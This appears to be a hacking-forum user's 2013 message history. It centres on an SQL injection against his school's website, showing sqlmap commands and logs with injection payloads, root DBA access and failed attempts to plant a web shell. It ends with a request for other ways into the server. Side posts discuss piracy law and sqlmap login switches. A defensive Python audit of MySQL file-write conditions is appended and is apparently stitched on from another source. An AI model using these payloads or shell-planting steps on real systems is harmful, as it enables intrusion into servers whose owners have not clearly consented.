

Messages - s0uthboy

1
General discussion / Re: Busted...
« on: September 02, 2013, 03:34:20 PM »
What country is that? Maybe I'll move there for a few weeks, download everything I can get my hands on, and then fly back to the States.  ;)


It's Italy :)


Quote from: Wikipedia
It is worth pointing out that in Italy anyone with the ability to download a work protected by copyright who puts it into sharing commits a criminal offence (Art. 171, letter a-bis, LDA). The rule is very clear: it punishes anyone who does it "without having the right, for any purpose and in any form".

2
Hacking and Security / Re: mysql db of my school
« on: August 27, 2013, 03:40:18 PM »
The directory you're trying to have sqlmap upload the shell to doesn't exist. Try a different directory when it prompts you for the web root.


That's the weird part, I'm sure that the directory exists, I've asked our teacher, and also if I do --file-read /var/www/school/docs/index.php sqlmap successfully dumps the index page...


If I try to browse that directory via browser it displays access denied, so I've tried some dirs that can be explored, /var/www/school/icons/ & /var/www/school/images/... I've got all privileges, as --roles says.. so I'm pretty much confused :(


I think that the MySQL privileges are limited on the machine, I mean that I can be root on the DBMS without having sudo privileges on the remote machine.


It's time to do my homework and find an RFI/LFI bug :D, too much automated exploitation is not the way

 

3
Are you sure that your target is vulnerable to your exploit?? You should know that many times the bug you intend to use has already been patched..

4
General discussion / Re: Torrenting in College
« on: August 23, 2013, 02:16:11 PM »
Not every client encrypts your traffic, some do (Vuze, uTorrent ...) but it's useless if the teacher you mentioned has physical access to the machine used for downloading illegal stuff.. since he can just check the download history.

5
General discussion / Re: Busted...
« on: August 23, 2013, 01:05:26 PM »
Seriously?? Can I ask where you are from??.. because in my country no type of p2p downloading is against the law, but the redistribution of downloaded media is punished with 4 years in jail... but only if I take money for it, I'm totally free to share my downloads with my friends, as long as I don't take money for it

6
sqlmap cannot just avoid the login, but if you know the credentials you can try the switches
Code:
--auth-cred name:password --auth-type (Basic, Digest or NTLM) if it is HTTP authentication,
try also
Code:
--dbms-cred user:password if you need to authenticate to the DB. That will work only if you know the credentials.
But I'm not sure that's your case, mmh maybe an sqlmap output will help


7
Hacking and Security / mysql db of my school
« on: August 21, 2013, 01:23:37 PM »

Hello there
My school website has a MySQL DB, I've found multiple vulnerabilities in it with MySQL.
I've asked our teacher (the webmaster) if I could practice some security tests.


I've found multiple vulnerabilities in the database, I've also cracked the admin password, but I've got a doubt that I will explain to your much more experienced eyes, so I'm in front of this scenario:


Code:
[*] starting at 13:06:17


[13:06:18] [INFO] resuming back-end DBMS 'mysql'
[13:06:18] [INFO] testing connection to the target URL
|S-chain|-<>-127.0.0.1:9050-<><>-*.*.*.*:80-<><>-OK
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: UNION query
    Title: MySQL UNION query (NULL) - 7 columns
    Payload: id=' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x3a786b793a,0x696e4f6a646e68504971,0x3a71666d3a),NULL#


    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: id=' AND 3502=BENCHMARK(5000000,MD5(0x48537954)) AND 'dqVz'='dqVz
---
[13:06:21] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5
[13:06:21] [INFO] fetching current user
current user:    'root@localhost'
[13:06:21] [INFO] testing if current user is DBA
[13:06:21] [INFO] fetching current user
current user is DBA:    True
[13:06:21] [INFO] fetched data logged to text files under '/opt/backbox/sqlmap/output/


[*] shutting down at 13:06:21


So the user is root and of course I have DBA permissions, but when I try the --os-shell switch I get this:


Code:
s0uthboy@GLaDOS2:~$ sudo proxychains /opt/backbox/sqlmap/sqlmap.py -u "http://www.schoolsite.it/index2.php?id=" --os-shell
ProxyChains-3.1 (http://proxychains.sf.net)


    sqlmap/1.0-dev-7ba9e75 - automatic SQL injection and database takeover tool
    http://sqlmap.org


[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program


[*] starting at 13:10:15


[13:10:16] [INFO] resuming back-end DBMS 'mysql'
[13:10:16] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: UNION query
    Title: MySQL UNION query (NULL) - 7 columns
    Payload: id=' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x3a786b793a,0x696e4f6a646e68504971,0x3a71666d3a),NULL#


    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: id=' AND 3502=BENCHMARK(5000000,MD5(0x48537954)) AND 'dqVz'='dqVz
---
[13:10:19] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5
[13:10:19] [INFO] going to use a web backdoor for command prompt
[13:10:19] [INFO] fingerprinting the back-end DBMS operating system
[13:10:19] [INFO] the back-end DBMS operating system is Linux
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
> 4
[13:10:21] [WARNING] unable to retrieve automatically the web server document root
what do you want to use for web server document root?
[1] common location(s) '/var/www/' (default)
[2] custom location
[3] custom directory list file
[4] brute force search


> 2
please provide the web server document root: /var/www/school/docs/
[13:12:24] [WARNING] unable to retrieve automatically any web server path
[13:12:24] [INFO] trying to upload the file stager on '/var/www/school/docs' via LIMIT INTO OUTFILE technique
[13:12:25] [WARNING] reflective value(s) found and filtering out
[13:12:26] [WARNING] unable to upload the file stager on '/var/www/school/docs'
[13:12:26] [INFO] trying to upload the file stager on '/var/www/school/docs' via UNION technique
[13:12:27] [WARNING] expect junk characters inside the file as a leftover from UNION query
[13:12:29] [WARNING] it looks like the file has not been written, this can occur if the DBMS process' user has no write privileges in the destination path
[13:12:30] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 2 times
[13:12:30] [INFO] fetched data logged to text files under


[*] shutting down at 13:12:30



Same errors with --os-cmd and --os-pwn, I've also made some tests using --sql-shell with the INTO OUTFILE technique, but nothing.

That's it, I need to know if there is another way to upload something, without using the admin panel on the website, or if there is another way to get into the server.


Thanks for your attention ;)
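Added example (not code from the thread or from sqlmap): a Python audit of the three conditions that sqlmap's last warning in the log above points at. A SELECT ... INTO OUTFILE into the web root needs the SQL account to hold the global FILE privilege (which the post's root@localhost DBA account does), secure_file_priv to permit the target directory, and the OS user mysqld runs as to have write access there; each condition that fails is a defensive layer worth keeping. The grants, uids, gids and directory mode below are constructed assumptions, chosen so that the result matches the outcome in the post (the DBMS process user cannot write /var/www/school/docs).

```python
import posixpath
import re
import stat

# Constructed sample inputs (not from the forum post): SHOW GRANTS lines for the account the
# web app uses, the web root with its (uid, gid, mode), and the (uid, gid) mysqld runs as.
GRANTS_ROOT = ["GRANT ALL PRIVILEGES ON *.* TO 'root'@'localhost' WITH GRANT OPTION"]
GRANTS_APP = ["GRANT USAGE ON *.* TO 'webapp'@'localhost'",
              "GRANT SELECT, INSERT, UPDATE, DELETE ON `school`.* TO 'webapp'@'localhost'"]
WEBROOT = "/var/www/school/docs"
WEBROOT_STAT = (33, 33, 0o755)   # assumed: owned by www-data, not world-writable
MYSQLD_IDS = (105, 110)          # assumed: mysqld runs as an unprivileged 'mysql' user

GRANT_RE = re.compile(r"^GRANT (.+?) ON \*\.\* TO ", re.I)

def account_has_file_priv(grants):
    """FILE is a global privilege, so only grants ON *.* count; ALL PRIVILEGES includes it."""
    for line in grants:
        m = GRANT_RE.match(line.strip())
        if m and {p.strip().upper() for p in m.group(1).split(",")} & {"ALL PRIVILEGES", "FILE"}:
            return True
    return False

def secure_file_priv_allows(setting, target_dir):
    """NULL disables INTO OUTFILE/LOAD_FILE, '' leaves them unrestricted, a path confines them."""
    if setting is None:
        return False
    if setting == "":
        return True
    allowed, target = posixpath.normpath(setting), posixpath.normpath(target_dir)
    return target == allowed or target.startswith(allowed + "/")

def daemon_can_write(dir_stat, mysqld_ids):
    """The OS user mysqld runs as (not the SQL account) needs write permission on the directory."""
    (uid, gid, mode), (m_uid, m_gid) = dir_stat, mysqld_ids
    if m_uid == 0 or (uid == m_uid and mode & stat.S_IWUSR):
        return True
    if gid == m_gid and mode & stat.S_IWGRP:
        return True
    return bool(mode & stat.S_IWOTH)

def audit_outfile_to_webroot(grants, setting, webroot, dir_stat, mysqld_ids):
    """Return (writable, exposures): a write needs all three, so each failing one is a layer to keep."""
    checks = {
        "account holds FILE privilege": account_has_file_priv(grants),
        "secure_file_priv permits the web root": secure_file_priv_allows(setting, webroot),
        "mysqld OS user can write the web root": daemon_can_write(dir_stat, mysqld_ids),
    }
    return all(checks.values()), [name for name, ok in checks.items() if ok]
```

With the constructed values the root account still has two of the three conditions in its favour, and only the filesystem permissions of the web root stop the write; swapping in the least-privilege GRANTS_APP account removes the FILE privilege as well.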
